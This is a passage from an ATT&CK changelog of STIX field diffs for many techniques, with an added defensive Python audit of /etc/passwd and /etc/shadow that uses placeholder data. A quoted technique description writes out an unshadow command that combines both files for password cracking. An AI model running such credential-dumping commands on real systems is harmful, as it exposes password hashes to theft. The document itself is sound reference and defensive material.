Linux stores user information such as user ID, group ID, home directory path, and login shell in /etc/passwd. A "user" on the system may belong to a person or a service. All password hashes are stored in /etc/shadow - including entries for users with no passwords and users with locked or disabled accounts.(Citation: Linux Password and Shadow File Formats)
Adversaries may attempt to read or dump the /etc/passwd and /etc/shadow files on Linux systems via command line utilities such as the cat command.(Citation: Arctic Wolf) Additionally, the Linux utility unshadow can be used to combine the two files in a format suited for password cracking utilities such as John the Ripper - for example, via the command /usr/bin/unshadow /etc/passwd /etc/shadow > /tmp/crack.password.db (Citation: nixCraft - John the Ripper). Since the user information stored in /etc/passwd are linked to the password hashes in /etc/shadow, an adversary would need to have access to both. |
x_mitre_version | 1.1 | 1.2 |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
external_references | | {'source_name': 'Arctic Wolf', 'description': 'Julian Tuin, Stefan Hostetler, Jon Grimm, Aaron Diaz, and Trevor Daher. (2024, November 22). Arctic Wolf Observes Threat Campaign Targeting Palo Alto Networks Firewall Devices. Retrieved January 8, 2025.', 'url': 'https://arcticwolf.com/resources/blog/arctic-wolf-observes-threat-campaign-targeting-palo-alto-networks-firewall-devices/'} |
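The revised T1003.008 description spells out what each file holds and that /etc/passwd entries are linked to /etc/shadow hashes by account name, that /etc/shadow must be root-only readable, and that shadow also carries entries with empty, locked or disabled password fields. The Python below is an added example (not ATT&CK's text or tooling) that audits those properties from the defender's side: it parses constructed passwd(5) and shadow(5) contents embedded in the block, reports accounts whose hash sits in the world-readable passwd file or that have no password at all, counts which shadow entries actually hold a hash, and checks the mode and owner of /etc/shadow. The sample lines and hash strings are constructed placeholders.

```python
"""Audit /etc/passwd and /etc/shadow hygiene (T1003.008). Works on text and
stat values so it runs offline; audit_host() reads the real files."""
import os
import stat

# Constructed sample contents; hash strings are placeholders, not real hashes.
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
legacy:$6$placeholder$hashinpasswd:1001:1001:Legacy:/home/legacy:/bin/bash
alice:x:1000:1000:Alice:/home/alice:/bin/bash
svc-backup:x:999:999::/var/lib/backup:/bin/sh
"""
SAMPLE_SHADOW = """root:$6$placeholder$roothash:19800:0:99999:7:::
daemon:*:19800:0:99999:7:::
alice:$6$placeholder$alicehash:19800:0:99999:7:::
svc-backup::19800:0:99999:7:::
"""
LOCKED_PREFIXES = ("!", "*")  # shadow(5): locked or no-login accounts


def parse_passwd(text):
    """name -> (uid, gid, shell, password_field) from passwd(5) lines."""
    entries = {}
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        name, pw, uid, gid, _gecos, _home, shell = line.split(":", 6)
        entries[name] = (int(uid), int(gid), shell, pw)
    return entries


def parse_shadow(text):
    """name -> password hash field from shadow(5) lines."""
    entries = {}
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        name, pw_hash = line.split(":", 8)[:2]
        entries[name] = pw_hash
    return entries


def audit_accounts(passwd_text, shadow_text):
    """Return (account, issue) pairs; hashes themselves are never echoed."""
    passwd = parse_passwd(passwd_text)
    shadow = parse_shadow(shadow_text)
    issues = []
    for name, (_uid, _gid, shell, pw) in passwd.items():
        if pw not in ("x", "*", "!"):
            issues.append((name, "hash stored in /etc/passwd"))  # world-readable
        if name not in shadow:
            if pw == "x":
                issues.append((name, "no /etc/shadow entry"))
            continue
        if shadow[name] == "" and not shell.endswith(("nologin", "false")):
            issues.append((name, "empty password with login shell"))
    for name in shadow:
        if name not in passwd:
            issues.append((name, "orphaned /etc/shadow entry"))
    return issues


def hash_bearing_accounts(shadow_text):
    """Accounts whose shadow entry holds a real hash (neither empty nor locked);
    only these are exposed to offline cracking if the file is read."""
    return sorted(n for n, h in parse_shadow(shadow_text).items()
                  if h and not h.startswith(LOCKED_PREFIXES))


def check_shadow_mode(st_mode, st_uid):
    """True when /etc/shadow is a regular file, root-owned, unreadable by others."""
    return stat.S_ISREG(st_mode) and st_uid == 0 and not (st_mode & stat.S_IROTH)


def audit_host(passwd_path="/etc/passwd", shadow_path="/etc/shadow"):
    """Run the checks against the live files (needs root to read shadow)."""
    st = os.stat(shadow_path)
    with open(passwd_path) as p, open(shadow_path) as s:
        issues = audit_accounts(p.read(), s.read())
    return check_shadow_mode(st.st_mode, st.st_uid), issues


if __name__ == "__main__":
    print(audit_accounts(SAMPLE_PASSWD, SAMPLE_SHADOW))
    print(hash_bearing_accounts(SAMPLE_SHADOW))
    print(check_shadow_mode(0o100640, 0), check_shadow_mode(0o100644, 0))
```

In the constructed data, `legacy` keeps its hash in /etc/passwd (readable by any local account, so the shadow protection described above does not apply to it) and `svc-backup` has an empty shadow field with an interactive shell; `daemon` is locked with `*` and is correctly excluded from the hash-bearing list. Pair the file-mode check with an auditd watch on read access to /etc/shadow, since the description notes that `cat` is enough once an adversary has the privilege.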
[T1558.004] Steal or Forge Kerberos Tickets: AS-REP Roasting
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_system_requirements | ['Valid domain account'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-10-15 15:32:07.850000+00:00 | 2025-04-15 19:58:23.309000+00:00 |
x_mitre_version | 1.1 | 1.2 |
[T1548] Abuse Elevation Control Mechanism
Current version: 1.5
Version changed from: 1.4 → 1.5
Details
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_permissions_required | ['Administrator', 'User'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-10-15 15:32:21.811000+00:00 | 2025-04-15 19:58:37.690000+00:00 |
x_mitre_detection | Monitor the file system for files that have the setuid or setgid bits set. Also look for any process API calls for behavior that may be indicative of [Process Injection](https://attack.mitre.org/techniques/T1055) and unusual loaded DLLs through [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), which indicate attempts to gain access to higher privileged processes. On Linux, auditd can alert every time a user's actual ID and effective ID are different (this is what happens when you sudo).
Consider monitoring for /usr/libexec/security_authtrampoline executions which may indicate that AuthorizationExecuteWithPrivileges is being executed. MacOS system logs may also indicate when AuthorizationExecuteWithPrivileges is being called. Monitoring OS API callbacks for the execution can also be a way to detect this behavior but requires specialized security tooling.
On Linux, auditd can alert every time a user's actual ID and effective ID are different (this is what happens when you sudo). This technique is abusing normal functionality in macOS and Linux systems, but sudo has the ability to log all input and output based on the LOG_INPUT and LOG_OUTPUT directives in the /etc/sudoers file.
There are many ways to perform UAC bypasses when a user is in the local administrator group on a system, so it may be difficult to target detection on all variations. Efforts should likely be placed on mitigation and collecting enough information on process launches and actions that could be performed before and after a UAC bypass is performed. Some UAC bypass methods rely on modifying specific, user-accessible Registry settings. Analysts should monitor Registry settings for unauthorized changes. | Monitor the file system for files that have the setuid or setgid bits set. Also look for any process API calls for behavior that may be indicative of [Process Injection](https://attack.mitre.org/techniques/T1055) and unusual loaded DLLs through [DLL](https://attack.mitre.org/techniques/T1574/001), which indicate attempts to gain access to higher privileged processes. On Linux, auditd can alert every time a user's actual ID and effective ID are different (this is what happens when you sudo).
Consider monitoring for /usr/libexec/security_authtrampoline executions which may indicate that AuthorizationExecuteWithPrivileges is being executed. MacOS system logs may also indicate when AuthorizationExecuteWithPrivileges is being called. Monitoring OS API callbacks for the execution can also be a way to detect this behavior but requires specialized security tooling.
On Linux, auditd can alert every time a user's actual ID and effective ID are different (this is what happens when you sudo). This technique is abusing normal functionality in macOS and Linux systems, but sudo has the ability to log all input and output based on the LOG_INPUT and LOG_OUTPUT directives in the /etc/sudoers file.
There are many ways to perform UAC bypasses when a user is in the local administrator group on a system, so it may be difficult to target detection on all variations. Efforts should likely be placed on mitigation and collecting enough information on process launches and actions that could be performed before and after a UAC bypass is performed. Some UAC bypass methods rely on modifying specific, user-accessible Registry settings. Analysts should monitor Registry settings for unauthorized changes. |
x_mitre_version | 1.4 | 1.5 |
[T1134] Access Token Manipulation
Current version: 2.1
Version changed from: 2.0 → 2.1
Details
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_defense_bypassed | ['Windows User Account Control', 'Heuristic Detection', 'System Access Controls', 'Host Forensic Analysis'] | |
x_mitre_effective_permissions | ['SYSTEM'] | |
x_mitre_permissions_required | ['User', 'Administrator'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-03-30 21:01:47.762000+00:00 | 2025-04-16 20:37:21.869000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
x_mitre_version | 2.0 | 2.1 |
[T1546.008] Event Triggered Execution: Accessibility Features
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_effective_permissions | ['SYSTEM'] | |
x_mitre_permissions_required | ['Administrator'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-04-21 12:33:18.602000+00:00 | 2025-04-15 19:58:41.211000+00:00 |
external_references[2]['description'] | Glyer, C., Kazanciyan, R. (2012, August 20). The “Hikit” Rootkit: Advanced and Persistent Attack Techniques (Part 1). Retrieved June 6, 2016. | Glyer, C., Kazanciyan, R. (2012, August 20). The “Hikit” Rootkit: Advanced and Persistent Attack Techniques (Part 1). Retrieved November 17, 2024. |
external_references[2]['url'] | https://www.fireeye.com/blog/threat-research/2012/08/hikit-rootkit-advanced-persistent-attack-techniques-part-1.html | https://web.archive.org/web/20190216180458/https://www.fireeye.com/blog/threat-research/2012/08/hikit-rootkit-advanced-persistent-attack-techniques-part-1.html |
external_references[4]['description'] | Tilbury, C. (2014, August 28). Registry Analysis with CrowdResponse. Retrieved November 12, 2014. | Tilbury, C. (2014, August 28). Registry Analysis with CrowdResponse. Retrieved November 17, 2024. |
external_references[4]['url'] | http://blog.crowdstrike.com/registry-analysis-with-crowdresponse/ | https://web.archive.org/web/20200730053039/https://www.crowdstrike.com/blog/registry-analysis-with-crowdresponse/ |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
x_mitre_version | 1.1 | 1.2 |
[T1531] Account Access Removal
Current version: 1.4
Version changed from: 1.3 → 1.4
Description (old):
Adversaries may interrupt availability of system and network resources by inhibiting access to accounts utilized by legitimate users. Accounts may be deleted, locked, or manipulated (ex: changed credentials) to remove access to accounts. Adversaries may also subsequently log off and/or perform a [System Shutdown/Reboot](https://attack.mitre.org/techniques/T1529) to set malicious changes into place.(Citation: CarbonBlack LockerGoga 2019)(Citation: Unit42 LockerGoga 2019)
In Windows, [Net](https://attack.mitre.org/software/S0039) utility, <code>Set-LocalUser</code> and <code>Set-ADAccountPassword</code> [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlets may be used by adversaries to modify user accounts. In Linux, the <code>passwd</code> utility may be used to change passwords. Accounts could also be disabled by Group Policy.
Adversaries who use ransomware or similar attacks may first perform this and other Impact behaviors, such as [Data Destruction](https://attack.mitre.org/techniques/T1485) and [Defacement](https://attack.mitre.org/techniques/T1491), in order to impede incident response/recovery before completing the [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486) objective.
Description (new):
Adversaries may interrupt availability of system and network resources by inhibiting access to accounts utilized by legitimate users. Accounts may be deleted, locked, or manipulated (ex: changed credentials) to remove access to accounts. Adversaries may also subsequently log off and/or perform a [System Shutdown/Reboot](https://attack.mitre.org/techniques/T1529) to set malicious changes into place.(Citation: CarbonBlack LockerGoga 2019)(Citation: Unit42 LockerGoga 2019)
In Windows, [Net](https://attack.mitre.org/software/S0039) utility, <code>Set-LocalUser</code> and <code>Set-ADAccountPassword</code> [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlets may be used by adversaries to modify user accounts. Accounts could also be disabled by Group Policy. In Linux, the <code>passwd</code> utility may be used to change passwords. On ESXi servers, accounts can be removed or modified via esxcli (`system account set`, `system account remove`).
Adversaries who use ransomware or similar attacks may first perform this and other Impact behaviors, such as [Data Destruction](https://attack.mitre.org/techniques/T1485) and [Defacement](https://attack.mitre.org/techniques/T1491), in order to impede incident response/recovery before completing the [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486) objective.
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-10-15 15:35:13.577000+00:00 | 2025-04-15 19:58:58.987000+00:00 |
description | Adversaries may interrupt availability of system and network resources by inhibiting access to accounts utilized by legitimate users. Accounts may be deleted, locked, or manipulated (ex: changed credentials) to remove access to accounts. Adversaries may also subsequently log off and/or perform a [System Shutdown/Reboot](https://attack.mitre.org/techniques/T1529) to set malicious changes into place.(Citation: CarbonBlack LockerGoga 2019)(Citation: Unit42 LockerGoga 2019)
In Windows, [Net](https://attack.mitre.org/software/S0039) utility, Set-LocalUser and Set-ADAccountPassword [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlets may be used by adversaries to modify user accounts. In Linux, the passwd utility may be used to change passwords. Accounts could also be disabled by Group Policy.
Adversaries who use ransomware or similar attacks may first perform this and other Impact behaviors, such as [Data Destruction](https://attack.mitre.org/techniques/T1485) and [Defacement](https://attack.mitre.org/techniques/T1491), in order to impede incident response/recovery before completing the [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486) objective. | Adversaries may interrupt availability of system and network resources by inhibiting access to accounts utilized by legitimate users. Accounts may be deleted, locked, or manipulated (ex: changed credentials) to remove access to accounts. Adversaries may also subsequently log off and/or perform a [System Shutdown/Reboot](https://attack.mitre.org/techniques/T1529) to set malicious changes into place.(Citation: CarbonBlack LockerGoga 2019)(Citation: Unit42 LockerGoga 2019)
In Windows, [Net](https://attack.mitre.org/software/S0039) utility, Set-LocalUser and Set-ADAccountPassword [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlets may be used by adversaries to modify user accounts. Accounts could also be disabled by Group Policy. In Linux, the passwd utility may be used to change passwords. On ESXi servers, accounts can be removed or modified via esxcli (`system account set`, `system account remove`).
Adversaries who use ransomware or similar attacks may first perform this and other Impact behaviors, such as [Data Destruction](https://attack.mitre.org/techniques/T1485) and [Defacement](https://attack.mitre.org/techniques/T1491), in order to impede incident response/recovery before completing the [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486) objective. |
x_mitre_version | 1.3 | 1.4 |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_platforms | | ESXi |
[T1087] Account Discovery
Current version: 2.6
Version changed from: 2.5 → 2.6
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-10-15 15:35:28.784000+00:00 | 2025-04-15 19:58:41.600000+00:00 |
external_references[3]['description'] | Stepanic, D.. (2020, January 13). Embracing offensive tooling: Building detections against Koadic using EQL. Retrieved November 30, 2020. | Stepanic, D.. (2020, January 13). Embracing offensive tooling: Building detections against Koadic using EQL. Retrieved November 17, 2024. |
external_references[3]['url'] | https://www.elastic.co/blog/embracing-offensive-tooling-building-detections-against-koadic-using-eql | https://www.elastic.co/security-labs/embracing-offensive-tooling-building-detections-against-koadic-using-eql |
x_mitre_version | 2.5 | 2.6 |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_platforms | | ESXi |
[T1098] Account Manipulation
Current version: 2.8
Version changed from: 2.7 → 2.8
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-10-15 15:35:57.382000+00:00 | 2025-04-15 19:58:54.718000+00:00 |
x_mitre_version | 2.7 | 2.8 |
x_mitre_platforms[5] | Network | Network Devices |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_platforms | | ESXi |
[T1547.014] Boot or Logon Autostart Execution: Active Setup
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_permissions_required | ['Administrator'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-03-22 14:17:17.353000+00:00 | 2025-04-15 19:58:13.464000+00:00 |
external_references[3]['description'] | Kindlund, D. (2012, December 30). CFR Watering Hole Attack Details. Retrieved December 18, 2020. | Kindlund, D. (2012, December 30). CFR Watering Hole Attack Details. Retrieved November 17, 2024. |
external_references[3]['url'] | https://www.fireeye.com/blog/threat-research/2012/12/council-foreign-relations-water-hole-attack-details.html | https://web.archive.org/web/20201024230407/https://www.fireeye.com/blog/threat-research/2012/12/council-foreign-relations-water-hole-attack-details.html |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
x_mitre_version | 1.0 | 1.1 |
[T1557] Adversary-in-the-Middle
Current version: 2.5
Version changed from: 2.4 → 2.5
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-04-18 14:26:21.852000+00:00 | 2025-04-15 19:58:02.209000+00:00 |
x_mitre_version | 2.4 | 2.5 |
x_mitre_platforms[3] | Network | Network Devices |
[T1546.009] Event Triggered Execution: AppCert DLLs
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_attack_spec_version | | 3.2.0 |
x_mitre_deprecated | | False |
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_effective_permissions | ['Administrator', 'SYSTEM'] | |
x_mitre_permissions_required | ['Administrator', 'SYSTEM'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-11-10 18:29:31.052000+00:00 | 2025-04-15 19:58:44.894000+00:00 |
external_references[3]['description'] | Microsoft. (2007, October 24). Windows Sysinternals - AppCertDlls. Retrieved December 18, 2017. | Microsoft. (2007, October 24). Windows Sysinternals - AppCertDlls. Retrieved November 17, 2024. |
external_references[3]['url'] | https://forum.sysinternals.com/appcertdlls_topic12546.html | https://web.archive.org/web/20130401232752/https://forum.sysinternals.com/appcertdlls_topic12546.html |
x_mitre_version | 1.0 | 1.1 |
[T1546.010] Event Triggered Execution: AppInit DLLs
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_effective_permissions | ['Administrator', 'SYSTEM'] | |
x_mitre_permissions_required | ['Administrator'] | |
x_mitre_system_requirements | ['Secure boot disabled on systems running Windows 8 and later'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-04-21 12:33:45.568000+00:00 | 2025-04-16 20:37:21.193000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
x_mitre_version | 1.1 | 1.2 |
[T1059.002] Command and Scripting Interpreter: AppleScript
Current version: 1.3
Version changed from: 1.2 → 1.3
Details
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_remote_support | False | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-10-15 14:18:20.087000+00:00 | 2025-04-15 19:58:22.484000+00:00 |
x_mitre_version | 1.2 | 1.3 |
[T1550.001] Use Alternate Authentication Material: Application Access Token
Current version: 1.8
Version changed from: 1.7 → 1.8
Details
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_defense_bypassed | ['System Access Controls'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-10-15 15:38:11.583000+00:00 | 2025-04-15 19:59:20.277000+00:00 |
x_mitre_version | 1.7 | 1.8 |
[T1071] Application Layer Protocol
Current version: 2.4
Version changed from: 2.3 → 2.4
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-08-28 14:10:33.145000+00:00 | 2025-04-15 19:58:21.401000+00:00 |
x_mitre_version | 2.3 | 2.4 |
x_mitre_platforms[3] | Network | Network Devices |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_platforms | | ESXi |
[T1546.011] Event Triggered Execution: Application Shimming
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_attack_spec_version | | 3.2.0 |
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_permissions_required | ['Administrator'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-11-10 18:29:31.094000+00:00 | 2025-04-15 19:58:26.274000+00:00 |
x_mitre_version | 1.0 | 1.1 |
[T1588.007] Obtain Capabilities: Artificial Intelligence
Current version: 1.1
Version changed from: 1.0 → 1.1
Description (old):
Adversaries may obtain access to generative artificial intelligence tools, such as large language models (LLMs), to aid various techniques during targeting. These tools may be used to inform, bolster, and enable a variety of malicious tasks including conducting [Reconnaissance](https://attack.mitre.org/tactics/TA0043), creating basic scripts, assisting social engineering, and even developing payloads.(Citation: MSFT-AI)
For example, by utilizing a publicly available LLM an adversary is essentially outsourcing or automating certain tasks to the tool. Using AI, the adversary may draft and generate content in a variety of written languages to be used in [Phishing](https://attack.mitre.org/techniques/T1566)/[Phishing for Information](https://attack.mitre.org/techniques/T1598) campaigns. The same publicly available tool may further enable vulnerability or other offensive research supporting [Develop Capabilities](https://attack.mitre.org/techniques/T1587). AI tools may also automate technical tasks by generating, refining, or otherwise enhancing (e.g., [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027)) malicious scripts and payloads.(Citation: OpenAI-CTI)
Description (new):
Adversaries may obtain access to generative artificial intelligence tools, such as large language models (LLMs), to aid various techniques during targeting. These tools may be used to inform, bolster, and enable a variety of malicious tasks, including conducting [Reconnaissance](https://attack.mitre.org/tactics/TA0043), creating basic scripts, assisting social engineering, and even developing payloads.(Citation: MSFT-AI)
For example, by utilizing a publicly available LLM an adversary is essentially outsourcing or automating certain tasks to the tool. Using AI, the adversary may draft and generate content in a variety of written languages to be used in [Phishing](https://attack.mitre.org/techniques/T1566)/[Phishing for Information](https://attack.mitre.org/techniques/T1598) campaigns. The same publicly available tool may further enable vulnerability or other offensive research supporting [Develop Capabilities](https://attack.mitre.org/techniques/T1587). AI tools may also automate technical tasks by generating, refining, or otherwise enhancing (e.g., [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027)) malicious scripts and payloads.(Citation: OpenAI-CTI) Finally, AI-generated text, images, audio, and video may be used for fraud, [Impersonation](https://attack.mitre.org/techniques/T1656), and other malicious activities.(Citation: Google-Vishing24)(Citation: IC3-AI24)(Citation: WSJ-Vishing-AI24)
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_contributors | | ['Menachem Goldstein'] |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-09-12 19:18:36.583000+00:00 | 2025-04-15 19:58:05.447000+00:00 |
description | Adversaries may obtain access to generative artificial intelligence tools, such as large language models (LLMs), to aid various techniques during targeting. These tools may be used to inform, bolster, and enable a variety of malicious tasks including conducting [Reconnaissance](https://attack.mitre.org/tactics/TA0043), creating basic scripts, assisting social engineering, and even developing payloads.(Citation: MSFT-AI)
For example, by utilizing a publicly available LLM an adversary is essentially outsourcing or automating certain tasks to the tool. Using AI, the adversary may draft and generate content in a variety of written languages to be used in [Phishing](https://attack.mitre.org/techniques/T1566)/[Phishing for Information](https://attack.mitre.org/techniques/T1598) campaigns. The same publicly available tool may further enable vulnerability or other offensive research supporting [Develop Capabilities](https://attack.mitre.org/techniques/T1587). AI tools may also automate technical tasks by generating, refining, or otherwise enhancing (e.g., [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027)) malicious scripts and payloads.(Citation: OpenAI-CTI) | Adversaries may obtain access to generative artificial intelligence tools, such as large language models (LLMs), to aid various techniques during targeting. These tools may be used to inform, bolster, and enable a variety of malicious tasks, including conducting [Reconnaissance](https://attack.mitre.org/tactics/TA0043), creating basic scripts, assisting social engineering, and even developing payloads.(Citation: MSFT-AI)
For example, by utilizing a publicly available LLM an adversary is essentially outsourcing or automating certain tasks to the tool. Using AI, the adversary may draft and generate content in a variety of written languages to be used in [Phishing](https://attack.mitre.org/techniques/T1566)/[Phishing for Information](https://attack.mitre.org/techniques/T1598) campaigns. The same publicly available tool may further enable vulnerability or other offensive research supporting [Develop Capabilities](https://attack.mitre.org/techniques/T1587). AI tools may also automate technical tasks by generating, refining, or otherwise enhancing (e.g., [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027)) malicious scripts and payloads.(Citation: OpenAI-CTI) Finally, AI-generated text, images, audio, and video may be used for fraud, [Impersonation](https://attack.mitre.org/techniques/T1656), and other malicious activities.(Citation: Google-Vishing24)(Citation: IC3-AI24)(Citation: WSJ-Vishing-AI24) |
x_mitre_detection | | Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on behaviors relating to the potential use of generative artificial intelligence (i.e. [Phishing](https://attack.mitre.org/techniques/T1566), [Phishing for Information](https://attack.mitre.org/techniques/T1598)). |
x_mitre_version | 1.0 | 1.1 |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
external_references | | {'source_name': 'WSJ-Vishing-AI24', 'description': 'Catherine Stupp. (2019, August 30). Fraudsters Used AI to Mimic CEO’s Voice in Unusual Cybercrime Case. Retrieved March 18, 2025.', 'url': 'https://www.wsj.com/articles/fraudsters-use-ai-to-mimic-ceos-voice-in-unusual-cybercrime-case-11567157402'} |
external_references | | {'source_name': 'Google-Vishing24', 'description': 'Emily Astranova, Pascal Issa. (2024, July 23). Whose Voice Is It Anyway? AI-Powered Voice Spoofing for Next-Gen Vishing Attacks. Retrieved March 18, 2025.', 'url': 'https://cloud.google.com/blog/topics/threat-intelligence/ai-powered-voice-spoofing-vishing-attacks'} |
external_references | | {'source_name': 'IC3-AI24', 'description': 'IC3. (2024, December 3). Criminals Use Generative Artificial Intelligence to Facilitate Financial Fraud. Retrieved March 18, 2025.', 'url': 'https://www.ic3.gov/PSA/2024/PSA241203'} |
[T1573.002] Encrypted Channel: Asymmetric Cryptography
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-12-26 20:59:21.941000+00:00 | 2025-04-15 19:59:03.664000+00:00 |
x_mitre_version | 1.1 | 1.2 |
x_mitre_platforms[3] | Network | Network Devices |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_platforms | | ESXi |
[T1055.004] Process Injection: Asynchronous Procedure Call
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_attack_spec_version | | 3.2.0 |
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_defense_bypassed | ['Application control', 'Anti-virus'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-10-18 12:23:46.476000+00:00 | 2025-04-15 19:58:44.390000+00:00 |
x_mitre_version | 1.1 | 1.2 |
[T1053.002] Scheduled Task/Job: At
Current version: 2.4
Version changed from: 2.3 → 2.4
Details
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_permissions_required | ['Administrator', 'User'] | |
x_mitre_remote_support | True | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-10-12 15:53:12.333000+00:00 | 2025-04-15 19:59:21.266000+00:00 |
x_mitre_version | 2.3 | 2.4 |
[T1547.002] Boot or Logon Autostart Execution: Authentication Package
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_permissions_required | ['Administrator'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-04-20 16:29:36.291000+00:00 | 2025-04-16 20:37:19.684000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
x_mitre_version | 1.0 | 1.1 |
[T1059.010] Command and Scripting Interpreter: AutoHotKey & AutoIT
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_remote_support | False | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-04-28 15:58:48.119000+00:00 | 2025-04-15 19:58:23.600000+00:00 |
x_mitre_version | 1.0 | 1.1 |
[T1119] Automated Collection
Current version: 1.4
Version changed from: 1.3 → 1.4
Details
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_system_requirements | ['Permissions to access directories, files, and API endpoints that store information of interest.'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-09-25 20:40:07.791000+00:00 | 2025-04-15 19:58:18.743000+00:00 |
x_mitre_version | 1.3 | 1.4 |
[T1020] Automated Exfiltration
Current version: 1.3
Version changed from: 1.2 → 1.3
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-01-24 00:04:01.066000+00:00 | 2025-04-15 19:58:42.569000+00:00 |
x_mitre_version | 1.2 | 1.3 |
x_mitre_platforms[3] | Network | Network Devices |
[T1197] BITS Jobs
Current version: 1.5
Version changed from: 1.4 → 1.5
Details
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_defense_bypassed | ['Firewall', 'Host forensic analysis'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-04-21 12:21:40.927000+00:00 | 2025-04-16 20:37:20.513000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
x_mitre_version | 1.4 | 1.5 |
[T1102.002] Web Service: Bidirectional Communication
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_attack_spec_version | | 3.2.0 |
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_permissions_required | ['User'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-03-26 23:15:47.861000+00:00 | 2025-04-15 19:59:03.009000+00:00 |
x_mitre_version | 1.0 | 1.1 |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_platforms | | ESXi |
[T1027.001] Obfuscated Files or Information: Binary Padding
Current version: 1.3
Version changed from: 1.2 → 1.3
Details
